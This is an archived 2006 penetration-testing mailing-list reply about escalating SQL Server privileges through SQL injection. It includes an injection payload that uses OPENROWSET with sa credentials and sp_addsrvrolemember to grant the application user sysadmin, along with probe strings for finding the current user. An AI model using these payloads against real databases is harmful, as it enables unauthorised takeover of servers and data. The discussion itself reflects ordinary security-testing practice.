Home page logo

pen-test logo Penetration Testing mailing list archives

RE: custom xp_cmdshell on SQL Server
From: "Victor Chapela" <victor () sm4rt com>
Date: Tue, 19 Sep 2006 19:20:32 -0500


Correct. But since I am injecting 'CREATE PROCEDURE' inside 
an OPENROWSET statement, that should solve the issue, as the 
SQL code inside the OPENROWSET is executed as a batch in 
itself (correct me if I am wrong)

You may be right and that would be a nice workaround for the create
procedure lockout. Have you tried it locally with openrowset and does it

I am running my code as an unprivileged user, but I escalated 
to 'sa' using OPENROWSET

But I mean an unprivileged OS user. SQL Server not always runs as NT
Authority/SYSTEM. If you are 'SA' you inherit SQL Server's privileges and at
the operating system level you can still be "guest" or more frequently an
account named sql_server or something (which may not have access to
executing system32 binaries).

' and 1=(select * from
=sa;PWD=<password>',N'select user; declare @u varchar(50); set @u =
rd>system_user); exec master.dbo.sp_addsrvrolemember @u,

There is an error in this query I sent you. You should avoid declaring the
variable because it is being set within the context of the openrowset query:
you will be adding SA to sysadmin the way it is. Try it this way:

' and 1=(select * from openrowset('SQLOLEDB','DRIVER={SQLServer};
SERVER=<server>;UID=sa;PWD=<password>',N'select user; exec
master.dbo.sp_addsrvrolemember <app user>, ''sysadmin'''))--

Obtain <app user> with [' and 1=system_user --] or [' and 1=user --] In this
case both should be the same.


This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]